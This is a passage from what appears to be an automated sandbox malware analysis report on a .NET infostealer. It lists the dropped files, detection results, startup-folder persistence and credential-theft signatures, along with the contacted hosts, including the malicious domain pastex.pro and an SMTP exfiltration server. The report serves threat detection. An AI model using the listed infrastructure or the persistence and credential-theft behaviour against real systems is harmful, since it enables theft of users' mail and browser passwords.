23 a.exe 15->23         started        file5 signatures6 process7 dnsIp8 46 pastex.pro 45.148.121.68, 49739, 49747, 49754 SKB-ENTERPRISENL Netherlands 17->46 48 raw.githubusercontent.com 185.199.108.133, 443, 49741, 49748 FASTLYUS Netherlands 17->48 76 Multi AV Scanner detection for dropped file 17->76 78 Machine Learning detection for dropped file 17->78 25 cmd.exe 1 17->25         started        50 smtp.saleforceconsults.com 21->50 52 us2.smtp.mailhostbox.com 208.91.199.223, 49761, 587 PUBLIC-DOMAIN-REGISTRYUS United States 21->52 54 3 other IPs or domains 21->54 80 Tries to steal Mail credentials (via file access) 21->80 82 Tries to harvest and steal browser information (history, passwords, etc) 21->82 signatures9 process10 signatures11 84 Suspicious powershell command line found 25->84 28 wscript.exe 25->28         started        31 powershell.exe 18 25->31         started        33 conhost.exe 25->33         started        35 timeout.exe 1 25->35         started        process12 signatures13 92 Drops PE files to the user root directory 28->92 94 Drops PE files to the startup folder 28->94 37 a.exe 31->37         started        process14 dnsIp15 56 raw.githubusercontent.com 37->56 58 pastex.pro 37->58 40 a.exe 37->40         started        process16

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  No Antivirus matches

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe100%Joe Sandbox ML
                  C:\ProgramData\a.exe100%Joe Sandbox ML
                  C:\ProgramData\a.exe8%MetadefenderBrowse
                  C:\ProgramData\a.exe28%ReversingLabsByteCode-MSIL.Infostealer.Maslog
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe8%MetadefenderBrowse
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe28%ReversingLabsByteCode-MSIL.Infostealer.Maslog

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  20.2.a.exe.400000.0.unpack100%AviraHEUR/AGEN.1139343Download File
                  13.2.a.exe.400000.0.unpack100%AviraHEUR/AGEN.1139343Download File

                  Domains

                  SourceDetectionScannerLabelLink
                  pastex.pro2%VirustotalBrowse
                  raw.githubusercontent.com0%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  https://cdn.entity.0%URL Reputationsafe
                  https://cdn.entity.0%URL Reputationsafe
                  https://cdn.entity.0%URL Reputationsafe
                  https://wus2-000.contentsync.0%URL Reputationsafe
                  https://wus2-000.contentsync.0%URL Reputationsafe
                  https://wus2-000.contentsync.0%URL Reputationsafe
                  https://powerlift.acompli.net0%URL Reputationsafe
                  https://powerlift.acompli.net0%URL Reputationsafe
                  https://powerlift.acompli.net0%URL Reputationsafe
                  https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                  https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                  https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                  https://cortana.ai0%URL Reputationsafe
                  https://cortana.ai0%URL Reputationsafe
                  https://cortana.ai0%URL Reputationsafe
                  https://api.aadrm.com/0%URL Reputationsafe
                  https://api.aadrm.com/0%URL Reputationsafe
                  https://api.aadrm.com/0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://api.ipify.orgD0%URL Reputationsafe
                  http://api.ipify.orgD0%URL Reputationsafe
                  http://api.ipify.orgD0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://api.ipify.org40%Avira URL Cloudsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                  https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                  https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                  https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
                  https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
                  https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
                  https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
                  http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                  http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                  http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                  https://store.office.cn/addinstemplate0%URL Reputationsafe
                  https://store.office.cn/addinstemplate0%URL Reputationsafe
                  https://store.office.cn/addinstemplate0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  https://wus2-000.pagecontentsync.0%URL Reputationsafe
                  https://wus2-000.pagecontentsync.0%URL Reputationsafe
                  https://wus2-000.pagecontentsync.0%URL Reputationsafe
                  https://go.micro0%URL Reputationsafe
                  https://go.micro0%URL Reputationsafe
                  https://go.micro0%URL Reputationsafe
                  https://store.officeppe.com/addinstemplate0%URL Reputationsafe
                  https://store.officeppe.com/addinstemplate0%URL Reputationsafe
                  https://store.officeppe.com/addinstemplate0%URL Reputationsafe
                  https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
                  https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
                  https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
                  https://raw.githubusercontent.com40%Avira URL Cloudsafe
                  https://www.odwebp.svc.ms0%URL Reputationsafe
                  https://www.odwebp.svc.ms0%URL Reputationsafe
                  https://www.odwebp.svc.ms0%URL Reputationsafe
                  https://dataservice.o365filtering.com/0%URL Reputationsafe
                  https://dataservice.o365filtering.com/0%URL Reputationsafe
                  https://dataservice.o365filtering.com/0%URL Reputationsafe
                  http://api.ipify0%Avira URL Cloudsafe
                  https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
                  https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
                  https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
                  https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
                  https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
                  http://ocsp.sectigo.com0A0%URL Reputationsafe
                  http://ocsp.sectigo.com0A0%URL Reputationsafe
                  http://ocsp.sectigo.com0A0%URL Reputationsafe
                  https://apis.live.net/v5.0/0%URL Reputationsafe
                  https://apis.live.net/v5.0/0%URL Reputationsafe
                  https://apis.live.net/v5.0/0%URL Reputationsafe
                  http://pastex.pro100%Avira URL Cloudmalware
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  pastex.pro
                  45.148.121.68
                  truefalseunknown
                  elb097307-934924932.us-east-1.elb.amazonaws.com
                  54.225.220.115
                  truefalse
                    high
                    us2.smtp.mailhostbox.com
                    208.91.199.223
                    truefalse
                      high
                      raw.githubusercontent.com
                      185.199.108.133
                      truefalseunknown
                      seyranikenger.com.tr
                      185.162.146.6
                      truefalse
                        unknown
                        smtp.saleforceconsults.com
                        unknown
                        unknowntrue
                          unknown
                          api.ipify.org
                          unknown
                          unknownfalse
                            high
                            www.seyranikenger.com.tr
                            unknown
                            unknowntrue
                              unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://api.ipify.org/false
                                high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://api.diagnosticssdf.office.com5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                  high
                                  https://login.microsoftonline.com/5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                    high
                                    https://shell.suite.office.com:14435EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                      high
                                      https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                        high
                                        http://us2.smtp.mailhostbox.coma.exe, 0000000D.00000002.953732965.0000000003073000.00000004.00000001.sdmpfalse
                                          high
                                          https://autodiscover-s.outlook.com/5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                            high
                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                              high
                                              https://cdn.entity.5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://api.addins.omex.office.net/appinfo/query5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                high
                                                https://wus2-000.contentsync.5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://clients.config.office.net/user/v1.0/tenantassociationkey5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                  high
                                                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                    high
                                                    https://powerlift.acompli.net5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://rpsticket.partnerservices.getmicrosoftkey.com5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://lookup.onenote.com/lookup/geolocation/v15EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                      high
                                                      https://cortana.ai5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com/designersa.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpfalse
                                                        high
                                                        https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                          high
                                                          https://cloudfiles.onenote.com/upload.aspx5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                            high
                                                            https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                              high
                                                              https://entitlement.diagnosticssdf.office.com5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                high
                                                                https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                  high
                                                                  https://api.aadrm.com/5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.sajatypeworks.coma.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://ofcrecsvcapi-int.azurewebsites.net/5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.founder.com.cn/cn/cThea.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://api.ipify.orgDa.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                    high
                                                                    https://api.microsoftstream.com/api/5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                      high
                                                                      https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                        high
                                                                        https://cr.office.com5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                          high
                                                                          http://www.galapagosdesign.com/DPleasea.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://api.ipify.org4a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.urwpp.deDPleasea.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.zhongyicts.com.cna.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://portal.office.com/account/?ref=ClientMeControl5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namea.exe, 00000001.00000002.709602421.00000000027A1000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000002.818610560.0000000004C71000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771982708.0000000002881000.00000004.00000001.sdmp, a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000011.00000002.841378696.00000000029A1000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://ecs.office.com/config/v2/Office5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                high
                                                                                https://graph.ppe.windows.net5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                  high
                                                                                  https://res.getmicrosoftkey.com/api/redemptionevents5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://powerlift-frontdesk.acompli.net5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://tasks.office.com5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                    high
                                                                                    https://officeci.azurewebsites.net/api/5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://sr.outlook.office.net/ws/speech/recognize/assistant/work5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                      high
                                                                                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#a.exe, 0000000D.00000002.956651743.000000000545A000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://store.office.cn/addinstemplate5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://wus2-000.pagecontentsync.5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        https://go.micropowershell.exe, 0000000A.00000003.789977084.0000000005699000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://outlook.office.com/autosuggest/api/v1/init?cvid=5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                          high
                                                                                          https://globaldisco.crm.dynamics.com5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                            high
                                                                                            https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                              high
                                                                                              https://store.officeppe.com/addinstemplate5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://dev0-api.acompli.net/autodetect5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://raw.githubusercontent.com4a.exe, 00000001.00000002.709635511.00000000027D3000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.772094694.00000000028B3000.00000004.00000001.sdmp, a.exe, 00000011.00000002.842665292.00000000029D3000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://www.odwebp.svc.ms5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://api.powerbi.com/v1.0/myorg/groups5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                high
                                                                                                https://web.microsoftstream.com/video/5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                  high
                                                                                                  https://graph.windows.net5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                    high
                                                                                                    https://dataservice.o365filtering.com/5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://api.ipifya.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://officesetup.getmicrosoftkey.com5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://analysis.windows.net/powerbi/api5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                        high
                                                                                                        http://www.carterandcone.comla.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://prod-global-autodetect.acompli.net/autodetect5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://www.fontbureau.com/designers/frere-user.htmla.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpfalse
                                                                                                          high
                                                                                                          https://outlook.office365.com/autodiscover/autodiscover.json5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                            high
                                                                                                            https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                              high
                                                                                                              https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                                high
                                                                                                                https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                                  high
                                                                                                                  https://www.newtonsoft.com/jsonschemaa.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                                      high
                                                                                                                      http://ocsp.sectigo.com0Aa.exe, 0000000D.00000002.956651743.000000000545A000.00000004.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                                        high
                                                                                                                        http://weather.service.msn.com/data.aspx5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                                          high
                                                                                                                          https://apis.live.net/v5.0/5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                                            high
                                                                                                                            https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                                              high
                                                                                                                              http://pastex.proa.exe, 00000001.00000002.709602421.00000000027A1000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771982708.0000000002881000.00000004.00000001.sdmp, a.exe, 00000011.00000002.841378696.00000000029A1000.00000004.00000001.sdmptrue
                                                                                                                              • Avira URL Cloud: malware
                                                                                                                              unknown
                                                                                                                              https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                                                high
                                                                                                                                https://management.azure.com5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                                                  high
                                                                                                                                  http://www.fontbureau.com/designersGa.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://incidents.diagnostics.office.com5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                                                      high
                                                                                                                                      http://www.fontbureau.com/designers/?a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://github.com/Pester/PesterPpowershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://www.founder.com.cn/cn/bThea.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/ios5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                                                            high
                                                                                                                                            http://www.fontbureau.com/designers?a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://insertmedia.bing.office.net/odc/insertmedia5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://o365auditrealtimeingestion.manage.office.com5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://outlook.office365.com/api/v1.0/me/Activities5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://api.office.net5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://incidents.diagnosticssdf.office.com5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        http://www.tiro.coma.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://asgsmsproxyapi.azurewebsites.net/5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://clients.config.office.net/user/v1.0/android/policies5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.newtonsoft.com/jsona.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmpfalse
                                                                                                                                                            high

                                                                                                                                                            Contacted IPs

                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                            Public

                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                            45.148.121.68
                                                                                                                                                            unknownNetherlands
